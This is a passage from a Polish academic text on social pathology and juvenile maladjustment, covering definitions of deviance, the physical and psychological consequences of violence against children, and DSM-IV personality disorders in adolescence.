objawach i dynamice czynów kryminalnych, obecnie staje się niewystarczające. Jest to
wynik zachodzących i nieuchronnych przeobrażeń w obrębie zmieniających się
uwarunkowań intencjonalnych przestępczości.
Zmiany w zakresie podłoża działań bezprawnych stają się coraz trudniejsze do
jednoznacznej diagnozy etiologicznej. Współczesne motywacje i pobudki działania
sprawców przestępstw są bardzo zbliżone do wymiaru ekonomicznego z jednoczesnym
nieliczeniem się sprawców przestępstw z konsekwencjami w postaci strat i krzywd
doznawanych przez pokrzywdzonych. Jest to bez wątpienia jedna z trwalszych i stałych
cech przestępczości w ogóle, bez względu na zachodzące w przeszłości, często w sposób
gwałtowny, zmiany polityczne, gospodarcze, kulturowe, czy też społeczno - ekonomiczne
w danym kraju.
Funkcjonowanie współczesnego człowieka w dynamicznie zmieniającej się
rzeczywistości społecznej opartej na nieograniczonym dostępie do najnowszych
technologii teleinformatycznych prowadzą do pojawiania się coraz to nowszych i stale
zmieniających się zagrożeń dla bezpieczeństwa publicznego, w tym bezpieczeństwa
indywidualnego jednostki. W poszukiwaniu związków przyczynowo – skutkowych ten
aspekt staje się szczególnie istotny w procesie wiktymizacji określonych kategorii
demograficznych, które bardzo często nie są właściwie przygotowane do adekwatnej
obrony i zracjonalizowanej asertywności, chroniącej przed różnymi formami
pokrzywdzenia.
Szczególnego znaczenia w diagnostyce pojawiających się zaburzeń w
zachowaniu nabiera okres, w którym pewne negatywne symptomy pojawiają się
pierwotnie i początkowo przybierają mniej groźne formy i stadia. Fundamentalne staje
się zatem to ażeby odpowiednio zareagować na pozornie niegroźne objawy występujące
w rozwoju dzieci, w postaci nieposłuszeństwa, nieuzasadnionego płaczu, krzyku, agresji
werbalnej, czy też buntu. Przy tym należy pamiętać, że nie ma idealnego modelu
przebiegu procesu uspołeczniania jednostki i w każdym przypadku w sposób naturalny
pojawią się zachowania noszące cechy świadczące o jakimś poziomie i rodzaju
nieprzystosowania do wymagań stawianych przez środowisko. Oczekiwania zewnętrzne
zmieniają się wraz z rozwojem i pełnionymi rolami wobec określonych grup społecznych.
Ich charakter ewoluuje z poziomu zindywidualizowanych dążeń w osiąganiu oraz
realizacji celów na rzecz grupowych zasad współżycia społecznego.
W czasach zdynamizowanej socjalizacji zakładane efekty nie zawsze są
pozytywne a ich negatywne przejawy pojawiają się na rożnym etapie rozwoju jednostki.
Zachowania nieakceptowane przez społeczeństwo przyjęto zazwyczaj określać jako
patologiczne, a więc przeciwstawne w relacji do obowiązujących normom oraz zasad
postępowania. Z uwagi na fakt, że ich symptomatologia ulega przeobrażeniom, powoduje
konieczność zmian w etiologicznym postrzeganiu źródeł wykolejenia społecznego, czy
też tak zwanej „antysocjalizacji”. Wśród czynników o charakterze destrukcyjnego
wpływu na kształtowanie osobowości społecznej bez wątpienia należy zaliczyć aspekty
relacji jednostki z najbliższym otoczeniem, w tym przede wszystkim występujące w
rodzinie. Stanowi ona podstawę kształtowania nie tylko relacji w kręgu osób najbliższych,
ale jest przede wszystkim fundamentem w zakresie uspołeczniania, czyli nabywania
niezbędnych nawyków w zakresie pozytywnej komunikacji i wieloaspektowych relacji
ze światem zewnętrznym. Zaburzenia w tej podstawowej dziedzinie mogą mieć
188
negatywne przełożenie na inne formy socjalizacji człowieka, co w efekcie objawia się w
postaci zachowań antyspołecznych, często jako antagonizmy i destrukcja.
Patologia społeczna jako antysocjalizacja
W ujęciu etymologicznym patologia społeczna postrzegana była jest jako nauka
o cierpieniu i pochodzi od greckiego słowa pathos rozumiane jako choroba czy też
cierpienie oraz logos czyli nauka. Takie ujęcie nie wskazuje precyzyjnie, o jaki organ
dotknięty chorobą chodzi, co jest symptomem choroby i co w końcu stanowi punkt
odniesienia w stosunku do ogółu społecznych dysfunkcji, określanych bardzo często
zamiennie jako przejawy dewiacji, nieprzystosowanie społeczne lub wykolejenie
społeczne. Należy zauważyć, że historycznie termin patologia miał zastosowanie głównie
w praktyce medycznej.
Nieuchronne procesy przeobrażeń w strukturach społecznych, powiększające się
podziały kulturowe, ekonomiczne, zróżnicowanie w zakresie dostępu do dóbr
materialnych, edukacji czy też ochrony zdrowia, stały się źródłem wieloaspektowych
konfliktów społecznych, które doprowadziły do pojawienia się oraz eskalacji
różnorodnych zachowań antyspołecznych. Współcześnie określenie patologia społeczna
obejmuje znacznie szerszy zakres zachowań postrzeganych jako dysfunkcyjne czy też
naruszające określony ład i porządek publiczny. Dotyczą także rożnych sfer działalności
i funkcjonowania człowieka.
Klasycznym już przykładem szerokiego postrzegania zjawiska jest definicja
zaproponowana przez Adama Podgóreckiego, który patologię społeczną rozumie jako:
„ten rodzaj zachowania, ten typ instytucji, ten typ funkcjonowania jakiegoś systemu
społecznego czy ten rodzaj struktury, który pozostaje w zasadniczej, niedającej się
pogodzić sprzeczności ze światopoglądowymi wartościami, które w danej społeczności
są akceptowane". W takim ujęciu problematyki odnaleźć należy pewien constans
pomiędzy określonym systemem wartości, co z kolei stanowi podstawę do zachowań
akceptowanych i zgodnych z oczekiwaniami społeczeństwa. Podstawą takich właśnie
postaw jest ukształtowany historycznie, lecz ulegający stałym i koniecznym zmianom
zbiór norm i wartości opartych na normach prawnych, zwyczajowych, moralnych, czy
też katolickich. W literaturze przedmiotu zaprezentowano szereg innych definicji
używanych do zakreślania istotnych granic zachowań patologicznych, między innymi:
• Zjawisko społeczne, które jest niezgodne z wzorami zachowań (postaw)
zawartymi w systemach normatywnych społeczności, stale się nasila i
jest dysfunkcjonalne, bowiem wyraźnie zakłóca funkcjonowanie danej
społeczności;
• Ogół przypadków: śmierci, szkód dla zdrowia, obniżenia poziomu
moralnego i strat materialnych, spowodowanych naruszeniem reguł
moralnych i prawnych oraz postępowaniem autodestrukcyjnym;
• Zachowania jednostki oddziaływującej destruktywnie na społeczeństwo
lub jego elementy oraz niezgodnego z wartościami uznawanymi w
danym kręgu kulturowym.
Należy podkreślić, że zakres przedmiotowy zagadnienia znajduje szereg
zamiennie stosowanych terminów, takich jak: dewiacja i dezorganizacja społeczna,
nieprzystosowanie społeczne, dysfunkcjonalność zachowań w odniesieniu do istotnych
celów społecznych, demoralizacja, czy też wykolejenie społeczne.
189
Dewiacja społeczna jest pojęciem alternatywnym do wymienionych powyżej i
należy ją rozważać pod kątem identyfikowania i określonego podejścia do problemów
społecznych:
• Podejście subiektywne – zakłada, że możliwe jest identyfikowanie
rozmaitych stanów rzeczy czy zachowań w życiu zbiorowym, które
utrudniają, zakłócają lub uniemożliwiają osiąganie celów społeczeństwa,
na podstawie właściwości intersubiektywnie sprawdzalnych cechujących
te stany rzeczy lub zachowania;
• Podejście obiektywno – subiektywne – zakłada, że przejawami
społecznego zła są takie stany społeczne, które znacząca część członków
społeczeństwa postrzega i odczuwa, jako łamanie wysoko cenionych
przez nich norm społecznych;
• Podejście subiektywne – przyjmowane w socjologicznym
konstruktywizmie, dopuszcza uznanie rozmaitych zjawisk i zachowań za
dewiacje czy problemy społeczne niezależnie od tego, ilu tak owe
zjawiska ocenia. W szczególnych przypadkach problemem społecznym
może być zjawisko, które jako problem przez innych w ogóle nie jest
dostrzegane bądź zjawisko, które w ogóle nie istnieje.
Nieprzystosowanie społeczne przyjęto postrzegać jako określony stan psychiczny,
który wiąże się z cierpieniem jednostki na tle wadliwych interakcji z otoczeniem. Dziecko
jest niedostosowane społecznie, jeśli rozwija się w sposób, który odbija się niekorzystnie
na nim samym lub innych. Bez ingerencji z zewnątrz nie może poprawić swoich relacji z
innymi. Zatem niedostosowana będzie zarówno jednostka bierna, zahamowana, jak i
agresywna i wroga. Nieprzystosowanie społeczne wyraża się często w skrajnym i
uporczywym łamaniu norm społecznych, moralnych, obyczajowych oraz lekceważeniem
oczekiwań społecznych przez jednostkę. Objawy omawianych stanów to zachowania
świadczące o występujących z różnym nasileniem przejawach zdemoralizowania
jednostki, do których najczęściej zalicza się: wagary, ucieczki z domu, spożywanie
alkoholu, kradzieże itp. Omawiany termin definiuje się ponadto jako zachowanie
nacechowane zespołem objawów świadczących o nieprzestrzeganiu podstawowych
zasad postepowania oraz norm społecznych obowiązujących dzieci i młodzież, jednaj
zachowania takie nie mają charakteru sporadycznego, ale są trwałe i powtarzają się
wielokrotnie.
Wykolejenie społeczne dotyczy najczęściej sfery postaw, a więc osobowości. W
literaturze odnaleźć można stanowisko, według którego jest to układ postaw, a także
osobowości, który występuje w różnym nasileniu i zakresie, które z kolei podlegają
określonym zmianom a postawy jednostek wykolejonych społecznie są dwojakiego
rodzaju:
• Układ postaw antagonistyczno – konstruktywnych, które manifestują się
przeciwstawianiem się wartościom społecznym i normom. Wynika to z
wyznawania wartości i norm ważnych w skali społeczeństwa, ale
przeciwstawnych tym, które aktualnie obowiązują.
• Postawy antagonistyczno – destruktywne, które są konsekwencją
egocentryzmu lub socjocentryzmu. Antagonizm destruktywny to w 80%
agresja a przy tym rodzaju postaw można z całym przekonaniem mówić
o wykolejeniu społecznym.
190
Przedstawione powyżej terminy są funkcjonalnie i znaczeniowo związane z
procesem socjalizacji, którego rozumienie z uwagi na szerokie zastosowanie w naukach
społecznych wykazuje cechy interdyscyplinarne. W psychologii, socjologii oraz
pedagogice zgodnie określa się socjalizację jako proces oddziaływania grupy na
jednostkę, wpajanie przez osoby i instytucje wychowujące systemu norm i wartości,
wzorców zachowań obowiązujących w danej zbiorowości, przez co jednostka ma stać się
pełnowartościowym członkiem społeczeństwa.
Socjalizacja jest procesem wieloaspektowym, w trakcie którego jednostka
gromadzi doświadczenie społeczne, wrasta w kulturę w swojej społeczności, uczy się
funkcjonowania w niej, wchodzi w role społeczne, a także kształtuje swoją osobowość.
Człowiek pod wpływem oddziaływań socjalizujących z istoty biologicznej staje się istotą
w pełni społeczną. W pewnym momencie bardzo istotny wpływ w dojrzewaniu
społecznym odgrywają instytucje, w tym odpowiedzialne za wychowanie, które uczą
jednostki respektu do obowiązujących standardów społecznych. Kształtują zachowania
aprobowane społecznie i dzięki temu może ona sprawniej w nim funkcjonować.
Fundamentalne znaczenie w procesie przystosowania społecznego odgrywa najbliższe
środowisko jednostki w tym osoby znaczące, związane emocjonalnie z jednostką np.
członkowie rodziny, posiadające w pewnym okresie rozwoju autorytet np. koledzy z
grupy rówieśniczej. Wymienione uwarunkowania jako istotne akcentuje J. Szczepański,
który postrzega socjalizację jako część całkowitego wpływu środowiska, która
wprowadza jednostkę do udziału w życiu społecznym, uczy ją zachowania według
przyjętych wzorów, uczy ją rozumienia kultury, czyni ją zdolną do wykonywania
określonych ról społecznych. Stwierdza ponadto, ze socjalizacja kształtuje człowieka
poprzez przystosowanie go do życia w zbiorowości, umożliwia porozumienie się i
inteligentne działanie w jej ramach, uczy także zachowań w osiąganiu celów życiowych.
Wśród autorów zaliczanych już do klasyków pedagogiki odnajdujemy
następujące stanowiska, między innymi: „niedostosowanie społeczne jest następstwem
zaburzeń w zachowaniu, które mogą prowadzić w swej najostrzejszej formie do
całkowitej aspołeczności”. Wskazuje się także potrzebę traktowania zachowań
świadczących o nieprzystosowaniu społecznym linearnie, jako proces: zaburzenia
emocjonalne – zaburzenia zachowania – niedostosowanie społeczne – patologia
społeczna - przestępczość.
W praktyce wychowawczej dziecko jest kwalifikowane do nieprzystosowanych
społecznie w momencie, gdy jego uzewnętrznione zachowania wskazują na nasilające się
oraz względnie trwałe i nasilające się postawy aspołeczne i antyspołeczne, co może
świadczyć o trwałych właściwościach osobowości. Pewne zachowania w postaci: wagary,
zaniedbywanie nauki, niestosowne zachowanie się w szkole i poza szkołą, przebywanie
dłuższe poza domem bez kontroli, wałęsanie się w towarzystwie zdemoralizowanych
kolegów i łączenie się w grupy, zachowania agresywne, wandalizm, ucieczki z domów,
picie alkoholu, używanie narkotyków, kradzieże, przerywanie nauki przed ukończeniem
szkoły, - jeśli nie występują jednostkowo, lecz jako zespoły, po dwa lub trzy różnego
rodzaju i systematycznie się powtarzają, świadczą o stopniu nieprzystosowania czy
demoralizacji.
Powoływany wcześniej Cz. Czapów zaproponował podział rodzajów wykolejenia
społecznego, których podział wynika z charakteru naruszanych norm społecznych:
1. Wykolejenie przestępcze – to osoby uprawiające:
- przestępczość złodziejską, jak kradzieże, kradzieże z włamaniem, wyłudzenia;
191
- przestępczość bandycką, do której należy zaliczyć: rozbój, kradzieże rozbójnicze,
wymuszenia celem zaboru mienia, przestępstwa przeciwko życiu i zdrowiu związane z
zaborem mienia;
- przestępczość zabawową, jak np.: wandalizm, użycie przemocy lub groźby
natychmiastowego użycia gwałtu, przestępstwa przeciwko życiu i zdrowiu, i godności
osobistej wynikające z motywów zabawowo – agresywnych, bojki i zgwałcenia.
2. Wykolejenie obyczajowe – do wykolejonych obyczajowo zaliczył
osoby odznaczające się:
- zachowaniami autodestrukcyjnymi, tj. alkoholizmem, narkomanią i skłonnością
do zamachów samobójczych i samouszkodzeń;
- wykolejeniami seksualnymi (np. przedwczesne rozpoczynanie współżycia
seksualnego, ekshibicjonizm i prostytucja);
- pasożytnictwem społecznym (młodzież, która nie uczy się i nie pracuje).
Dla systematyki pojęć związanych z tak zwanymi zachowaniami
antyspołecznymi koniecznym wydaje się próba zdefiniowania i przedstawienie zakresu
symptomów świadczących o demoralizacji. W obowiązujących przepisach do zachowań
tych w szczególności zalicza się naruszanie zasad współżycia społecznego, popełnienie
czynu zabronionego, systematyczne uchylanie się od obowiązku szkolnego lub
kształcenia zawodowego, używanie alkoholu lub innych środków w celu wprowadzenia
się w stan odurzenia, uprawianie nierządu, włóczęgostwo, udział w grupach
przestępczych.
Reasumując ten fragment rozważań należy pamiętać, że wymieniony katalog
zachowań jest niepełny, ponieważ nie uwzględnia przeobrażeń ilościowych oraz
jakościowych w obrębie zachodzących zjawisk patologicznych. Bardzo istotnym wydaje
się fakt zwrócenia uwagi na łamanie przez osoby nieprzystosowane społecznie zespołu
norm społecznych, tak prawnych, czy też tylko moralnych, jednak najczęściej jednych i
drugich. Trudności wyłaniają się przy zakwalifikowaniu jako dewiacyjne zachowań
nieznajdujących odzwierciedlenia w artykułach kodeksu karnego czy kodeksu wykroczeń.
Uznanie ich za takie oparte jest na pewnej dowolności i arbitralności oraz odniesieniu się
do opinii społeczeństwa w zakresie oceny i zakwalifikowania zachowań jako dewiacyjne.
Zróżnicowanie ocen dotyczy także grup wiekowych i ich rozpoznaną już patogenną rolę.
Dotyczy to przede wszystkim takich zachowań, które są aprobowane i uznawane za
normalne wśród dorosłych, potępiane zaś w przypadkach, gdy dopuszcza się ich młodzież,
np. picie alkoholu czy promiskuityzm seksualny w wieku znacznie poniżej aprobowanych
w tej mierze standardów. Powyższe wskazuje, że w tego typu ocenach nie można ustrzec
się pewnej arbitralności i subiektywności w zakresie uznania określonych zachowań jako
dewiacyjne, jest to nieuniknione.
Psychofizyczne konsekwencje przemocy
Każde nasze postępowanie związane jest z określonymi reakcjami, które
zazwyczaj wywołują bardzo różnorodne skutkami. Istnieje podział, w którym dzielone są
one na pozytywne, jak i negatywne, ale również na takie które mogą być bezpośrednim
lub pośrednim rezultatem określonych działań. W przypadku przemocy lub
uzewnętrznionych aspektów agresji, będą to tylko skutki negatywne.
Rezultatem stosowania jakiejkolwiek przewagi wobec innych osób w najlepszym
przypadku może być lekkie zranienie, a w najgorszym nawet śmierć. Wymienione formy
przemocy najmocniej oddziałują na dzieci, czyli osoby bezbronne, niemogące zastosować
właściwych form przeciwdziałania przemocy. Dziecko, które doświadczyło różnych form
192
przemocy odczuwa różnorodne tego konsekwencje, nie tylko w wieku szkolnym, ale
także później w wieku dorosłym.
Wśród wielu skutków działań przemocowych wymienia się najczęściej:
• Somatyczne specyficzne: uszkodzenie skóry i obrażenia w postaci
śladów uderzeń, oparzeń papierosem, szczypania, uderzeń sznurem,
śladów ugryzień, wiązania, duszenia, siniaków, obrażeń narządów
wewnętrznych; m.in.: wątroby i śledziony, mnogich złamań
prowadzących do kalectwa; zgonów - wymienione skutki występują u
ofiar najczęściej i są najbardziej widoczne, co pozwala je dostrzec komuś
z zewnątrz i stwierdzenie podejrzenia faktu przemocy;
• Somatyczne niespecyficzne: nietrzymanie moczu i kału, drżenie,
wymioty, bole i zawroty głowy, potliwość, brak reakcji na ból – organizm
w ten sposób reaguje na bodźce zewnętrzne;
• Dysfunkcje psychiczne i behawioralne: obniżona samoocena, brak
akceptacji siebie, brak potrzeby bezpieczeństwa i przynależności,
koszmary nocne, depresja, zaburzenia koncentracji i zachowania,
lękliwość wobec innych ludzi, zachowania agresywne.
Wymienione przykłady to konsekwencje przemocy bezpośredniej, natomiast nie
należy zapominać o tych, które dostrzegalne są po jakimś czasie i dotyczą tak zwanej
wiktymizacja pierwotnej, czy też wielokrotnej. Zalicza się do nich:
• Trwałe uszkodzenia narządów wewnętrznych jako efekt długotrwałej
przemocy, która mocno wpłynęła na funkcjonowanie narządów;
• Stałe napięcie mięśni np. drżenie rąk, tiki nerwowe jako efekt minionych
doświadczeń, które wpłynęły na sferę neurologiczną;
• Choroby somatyczne, które wystąpiły w trakcie aktów przemocy i na
stałe zapisały się w organizmie;
• Małe poczucie własnej wartości;
• Stosowanie przemocy wobec innych jako naśladownictwo wyniesione
najczęściej z domu rodzinnego np. stosowanie przemocy w stosunku do
członków własnej rodziny.
Skutki przemocy fizycznej dzielone są według stopnia zaawansowania na cztery
kategorie:
• Niewielkie uszkodzenia ciała;
• Powierzchowne rozległe lub bardziej rozległe uszkodzenia skóry;
• Bardzo poważne;
• Zagrażające życiu.
Stosowanie przemocy stricte emocjonalnej wywołuje szereg bardzo poważnych
konsekwencji w zakresie psychiki ofiar przemocy w postaci znęcania się, nacisku,
wywierania nieustannej presji, form deprywacji jednostki, poniżania, odrzucenia, a także
stygmatyzacji. Do występujących najczęściej zalicza się:
• Następstwa somatyczne w postaci biegunki, bólów żołądka, zawrotów
głowy, problemów z wydalaniem;
• Zaburzenia emocjonalne, poznawcze i behawioralne w postaci
niepanowania nad emocjami, obniżoną samooceną, lekami i fobiami,
depresją, nerwicą, a w przypadku uczniów – ucieczki z domów i
problemy z nauką oraz popadanie w uzależnienia;
• Zaburzenia ciśnienia, choroby psychosomatyczne (astma, zawał serca
193
itp.), niska samoocena w skutek zniszczenia psychiki danej osoby przez
sprawcę i to utrudnia powrót do normalności, poczucie alienacji i
wycofania z powodu obaw ofiary przed kolejną krzywdą, depresja.
Jednym z rodzajów przemocy występującej w relacjach pomiędzy ofiarą a
sprawcą jest przemoc seksualna, której konsekwencje często występują z różnym
nasileniem jeszcze w dalszym życiu jednostki wykorzystanej i przymuszanej do
obcowania płciowego lub poddania się czynnościom seksualnym. Wśród skutków tej
formy przemocy wymienia się między innymi:
• Somatyczne – zewnętrzne urazy narządów płciowych, przerwanie błony
dziewiczej, infekcje jamy ustnej, choroby przenoszone drogą płciową;
• Zaburzenia emocjonalne, poznawcze, behawioralne i seksualne:
zaburzenia snu, lęki nocne, poczucie winy, erotyzacja dziecka,
prowokacyjne zachowania seksualne, izolowanie się od innych, nerwice,
popadanie w uzależnienia;
• Somatyczne, odległe konsekwencje:
- anoreksja lub bulimia,
- bezsenność – koszmar jakiego doświadczyła ofiara sprawia, że nie może ona
zasnąć, strach przed kolejnym atakiem,
- zaburzenia miesiączkowania – organizm tak właśnie reaguje na krzywdę,
- psychozy – związane z doświadczeniem gwałtu,
- próby samobójcze – kobiety wstydzą się tego co się wydarzyło, nie potrafią
pogodzić się takim bólem i w ten sposób desperacko wołają o pomoc.
Należy zauważyć, że występujące formy przemocy często występują łącznie
(Rysunek 1) a jedną z bardziej współczesnych form, której nie powinno się bagatelizować
jest przemoc ekonomiczna, często definiowana jako zachowania, których celem jest
kontrolowanie zdolności jednego partnera wobec drugiego do nabywania, utrzymywania
i korzystania z zasobów ekonomicznych gospodarstwa domowego. Jest to też szeroki
wachlarz nadużyć ekonomicznych, których celem jest utrzymanie dominacji i kontrola
partnera.
Rysunek 1. Formy przemocy
Źródło: opracowanie własne na podstawie D. Jaszczak – Kuźmińska, K. Michalska,
Przemoc w rodzinie wobec osób starszych i niepełnosprawnych. Poradnik dla pracowników
pierwszego kontaktu, Ministerstwo pracy i polityki społecznej, Warszawa 2010, s.11.
Osobowość w okresie adolescencji
Pojęcie zaburzeń osobowości jest terminem powszechnie stosowanym w
psychologii, gdzie oznacza: „… trwałe wzorce wewnętrznych doświadczeń i zachowań,
które znacząco odbiegają od oczekiwań kultury, w której żyje dana jednostka”.
Zaburzenia takie obejmują stany polegające na „chronicznym, całościowym, sztywnym i
nie przystosowawczym wzorcu myślenia, emocji, relacji społecznych lub kontroli nad
Przemoc
fizyczna Przemoc
seksualna Przemoc
psychiczna Przemoc
ekonomiczna
194
impulsami”. W tym sensie zaburzenia osobowości stanowią swoiste „odchylenie” dla „…
stosunkowo stabilnych psychicznych i behawioralnych właściwości jednostki, jej
sposobu patrzenia na świat i jej odniesień do niego”, jak w psychologii zwykło się
definiować osobowość człowieka. Natomiast w ujęciu psychopatologicznym zaburzenia
osobowości obejmują „… zaburzenia psychiczne powodujące przede wszystkim
nieprawidłowe zachowanie oraz utrudniające lub uniemożliwiające przystosowanie do
środowiska społecznego, a ściślej życia społecznego”.
. Granica pomiędzy zachowaniem normatywnym a patologicznym, w
szczególności w odniesieniu do zaburzeń osobowości, wydaje się być wyjątkowo
względna. To, co ma pozwalać na zdiagnozowanie takich zaburzeń jako cecha samoistna,
niepołączona z innymi właściwościami charakterologicznymi, wcale nierzadko nie
stanowi ich symptomu. Głównie z tego powodu zachować należy szczególną ostrożność
w opiniowaniu tego typu stanów.
Perspektywa społeczno-kulturowa wskazuje, że różne cechy osobowości w
zależności od kontekstu mogą mieć pozytywne bądź negatywne znaczenie oraz że
diagnoza nozologiczna może nie odzwierciedlać złożoności uwarunkowań zachowań
ludzkich. Diagnoza zaburzenia osobowości może również patologizować i
uprzedmiotawiać jednostkę oraz przyczyniać się do pomijania złożoności przyczyn
funkcjonowania człowieka, a także wpływać na dystansowanie się wobec problemu
jednostki. Rozważania w niniejszym rozdziale skłaniają do spojrzenia na zaburzenia
osobowości nie tylko jako patologiczny wzorzec funkcjonowania jednostki, lecz również
jako zaburzenia związane ze sferą relacji międzyludzkich występujących w określonej
kulturze. Diagnoza nozologiczna wywodzi się z modelu medycznego i chociaż obecnie
podkreśla się wzajemny wpływ czynników biologicznych i psychologicznych na
zachowanie jednostki, to medyczna perspektywa koncentruje się jedynie na wpływie
czynników środowiskowych na człowieka, a nie ich wzajemnej interakcji. Perspektywa
społeczno-kulturowa uzmysławia powiązanie czynników bio – psycho - społecznych w
funkcjonowaniu jednostki.
Diagnoza zaburzeń osobowości u młodzieży wywołuje wiele kontrowersji wśród
specjalistów z dziedziny psychologii klinicznej, psychoterapii a także psychiatrii. Te
kontrowersje są ściśle powiązane z definicją zaburzeń osobowości w DSM-IV, w której
podkreśla się, że jest to utrzymujący się w czasie, nieelastyczny sposób spostrzegania
siebie i świata, które manifestuje się w sferze poznawczej, afektywnej, kontroli impulsów
oraz interpersonalnej. Stabilność wzorców zachowania, myślenia i emocji prowadzi do
pogorszenia funkcjonowania jednostki. Te stabilne wzorce postrzegania mogą sięgać do
okresu dojrzewania lub nawet dzieciństwa. Zauważa się jednak, że zaburzenia te mogą
zaznaczyć się już w okresie adolescencji, ale stabilizują się w dorosłości.
Klasyfikacja DSM – IV wyróżnia następujące grupy zaburzeń psychicznych:
1. Zaburzenia rozpoznawane po raz pierwszy w okresie niemowlęcym,
dziecięcym lub młodzieżowym: upośledzenie, zaburzenia w uczeniu się, zaburzenia
motoryczne, zaburzenia w komunikowaniu się, rozległe zaburzenia rozwoju (np. autyzm),
zespól deficytu uwagi z nadruchliwością, zaburzenia w odżywianiu.
2. Zaburzenia świadomości, otępienie oraz zaburzenia pamięci i innych
procesów poznawczych (np. stany wywołane zatruciem substancjami psychoaktywnymi).
3. Zaburzenia psychiczne wywołane ogólnym złym stanem zdrowia (np.
zaburzenia katatoniczne).
195
4. Zaburzenia związane z używaniem substancji uzależniających (min.
nadużywanie alkoholu, amfetamin, kofeiny, konopii indyjskich, kokainy, środków
uspokajających).
5. Schizofrenia i inne zaburzenia psychotyczne.
6. Zaburzenia nastroju (depresja).
7. Zaburzenia lękowe, fobie.
8. Zaburzenia samopodobne (somatoidlane zaburzenia bólowe).
9. Zaburzenia pozorowane.
10. Zaburzenia dysocjalne (m.in. amnezja dysocjalna, zaburzenia
depresjonalizacyjne).
11. Zaburzenia seksualne i tożsamości płciowej.
12. Zaburzenia w odżywianiu (m.in. anoreksja, bulimia).
13. Zaburzenia snu.
14. Zachowania impulsywne (m.in. wybuchowość, kleptomania, piromania,
hazard patologiczny).
15. Zaburzenia przystosowania (m.in. zaburzenia przystosowania z
nastrojem depresyjnym, lękowym, lękowo-depresyjnym z mieszanymi uczuciami
emocjonalnymi i kontroli zachowania).
16. Zaburzenia osobowości (m.in. osobowość schizoidalna, schizotypiczna,
antyspołeczna z pogranicza (bordeline) histroniczna, narcystyczna, wycofująca się,
nadmiernie zależna, obsesyjno – kompulsywna).
17. Inne przypadki mogące być przedmiotem zainteresowania klinicysty.
Bez wątpienia w procesie dojrzewania ważny jest każdy moment, w którym
osobowość się zmienia. Rozwijają się różne aspekty osobowości np. zmiana stylu
myślenia i wzbogacania relacji ze światem zewnętrznym. Ta wiedza jest niezbędna w
aspekcie znalezienia sposobów i możliwości właściwej diagnostyki. W nawiązaniu do
zaburzeń osobowości i klasyfikacji DSM-IV przyjęto w niej dziesięć osobowości
zaburzonych:
• Osobowość paranoiczna - charakteryzuje się występowaniem
uporczywej nieufności i podejrzliwości wobec innych osób w rezultacie
czego motywy ich postępowania są interpretowane jako nieżyczliwe.
• Osobowość schizoidalna – charakteryzuje się odosobnieniem od
środowiska społecznego oraz ograniczeniem zakresu wyrażania uczuć.
• Osobowość schizotypowa - w obrazie klinicznym dominuje defekt w
zakresie umiejętności nawiązywania kontaktów międzyludzkich, który
objawia się dziwacznością w postrzeganiu, myśleniu i zachowaniu w
odniesieniu do relacji z bliskimi osobami.
• Osobowość antyspołeczna – pojawia się przed 15 rokiem życia i
charakteryzuje się głównie lekceważeniem praw innych ludzi.
• Osobowość typu bordeline – charakteryzuje się niestabilnością w
relacjach interpersonalnych w zakresie obrazu własnej osoby i nastroju
oraz nadmierną impulsywnością.
• Osobowość histrioniczna – przybiera postać nadmiernych reakcji
emocjonalnych i zwracania na siebie uwagę.
• Osobowość narcystyczna – charakteryzuje się stale utrzymującą się
zawyżoną samooceną, potrzebą doznawania podziwu, przeczuleniem na
punkcie opinii innych o osobie przy jednoczesnej niezdolności do
196
empatii.
• Osobowość lękliwa (unikająca) – charakteryzuje się unikaniem
kontaktów społecznych, poczuciem niepokoju i lęku przed krytyką i
odrzuceniem przez otoczenie społeczne.
• Osobowość zależna – charakteryzuje się trwałą i przemożna potrzebą
doznawania czyjejś opieki, która prowadzi do uległości i tendencji do
„przylepiania się” do innych ludzi i ciągłego leku przed rozstaniem z
nimi.
• Osobowość obsesyjno – kompulsywna (anankastyczna) – wśród
zachowań dominujących wymienia się: zajmowanie się porządkiem,
perfekcjonizm, oraz narzucanie kontroli sobie i innym kosztem
otwartości i niezbędnej tolerancji.
W tym miejscu nasuwa się pytanie, czy można w sposób prawidłowy rozpoznać
zaburzenie osobowości w okresie adolescencji. Właściwych odpowiedzi należałoby
oczekiwać od terapeutów czy klinistów. Bez właściwego zasobu wiedzy i doświadczenia
a także odpowiednich technik i narzędzi umożliwiających sformułowanie trafnej
diagnozy będzie to bardzo trudne. Jest to związane z tym, że osobowość dzieci i
młodzieży nie wykrystalizowała się w pełni, zachodzące procesy kształtowania
osobowości oraz tożsamości sprawiają, że wzorce zachowania i przeżywania adolescenta
szybko ulegają zmianie. Ważnym powodem w zachowaniu ostrożności jest także fakt, że
diagnostyka zaburzeń osobowości w adolescencji może wywołać konsekwencje
etykietyzowania, a więc nadania pewnego stygmatu, co może utrudniać pozytywne
leczenie. Nie bez znaczenia jest również możliwość negatywnego postrzegania samego
siebie, a także przez rówieśników.
Podsumowanie
Obecny przedmiot badań kryminologii ulega ciągłej ewaluacji co związane jest
ze zmianami w zakresie etiologicznych uwarunkowań zachowań określanych jako
patologiczne. Ich postrzeganie związane jest z kontekstem wpływu czynników
kryminogennych, których oddziaływanie związane jest coraz częściej z
funkcjonowaniem i socjalizacją w obrębie grup pierwotnych. Należy podkreślić, że
aspekty socjalizacji młodego człowieka, do tej pory rozpatrywano w kategorii relacji z
grupami pierwotnymi. Do utrwalonej w pedagogice społecznej i psychologii rozwojowej
triady: rodzina – szkoła – grupa rówieśnicza koniecznością staje się dodanie istotnego
elementu uspołeczniania w postaci wirtualizacji komunikacji ze światem zewnętrznym.
Zachowania dysfunkcyjne powszechnie określane jako patologiczne,
antyspołeczne, naruszające obowiązujący system norm i zasad postępowania, czy też
przejawy dewiacji i wykolejenia społecznego od wielu lat stanowią przedmiot dociekań
naukowych w zakresie genezy przestępczości. Związki formalno – prawne zazwyczaj nie
budzą większych wątpliwości, ponieważ ich charakter zdefiniowany został w
obowiązującym prawie i można określić je jako bezpośrednie. Inaczej przedstawiają się
związki pośrednie, w szczególności w zakresie ich powstawania oraz uzewnętrzniania
zachowań antagonistyczno – destruktywnych. Tego typu relacje zawsze wymagają
analizy podłużnej linii życiowej jednostki nieprzystosowanej społecznie. Bez dostępu do
wieloaspektowych, przede wszystkim, psychospołecznych danych na temat życia osoby,
nie jest to możliwe, a analiza oparta na informacjach zebranych na podstawie
197
konieczności interwencji w trybie nagłego przypadku, nie może być i nie jest w pełni
wartościowa pod względem diagnostycznym.
Określenie przyczyn nieprzystosowania społecznego wymaga dotarcia do źródeł
zaburzeń, których genetyczne podłoże najczęściej tkwi w relacjach związanych z rodziną
i jej członkami. Konflikty personalne z osobami najbliższymi mogą stać się zarzewiem
